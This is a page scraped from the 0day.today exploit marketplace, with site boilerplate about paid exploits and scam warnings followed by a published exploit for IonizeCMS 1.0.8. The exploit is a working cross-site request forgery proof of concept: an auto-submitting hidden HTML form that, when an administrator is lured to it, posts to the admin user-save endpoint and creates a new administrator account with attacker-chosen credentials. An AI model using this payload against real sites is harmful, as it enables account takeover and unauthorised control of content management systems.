0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)
<!-- # Exploit Title: IonizeCMS <= 1.0.8 Remote Admin Add CSRF Exploit # Exploit Author: s0nk3y # Google Dork: - # Date: 21/06/2016 # Vendor Homepage: http://ionizecms.com/ # Software Link: https://github.com/ionize/ionize/archive/1.0.8.1.zip # Version: 1.0.8 # Tested on: Ubuntu 16.04 IonizeCMS is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted to (http://localhost/en/admin/user/save) that will add a new user as administrator. Once exploited, the attacker can login to the admin panel ( http://localhost/en/admin/auth/login) using the username and the password he posted in the form. CSRF PoC Code ============= --> <form method="post" action="http://localhost/en/admin/user/save"> <input type="hidden" name="id_user"/> <input type="hidden" name="join_date"/> <input type="hidden" name="salt"/> <input type="hidden" name="from"/> <input type="hidden" name="username" value="attacker"> <input type="hidden" name="screen_name" value="attacker"> <input type="hidden" name="email" value="attacker@email.com"/> <input type="hidden" name="id_role" value="2"/> <input type="hidden" name="password" value="attackerPassword"/> <input type="hidden" name="password2" value="attackerPassword"/> </form> <script> document.forms[0].submit(); </script> # 0day.today [2024-11-16] #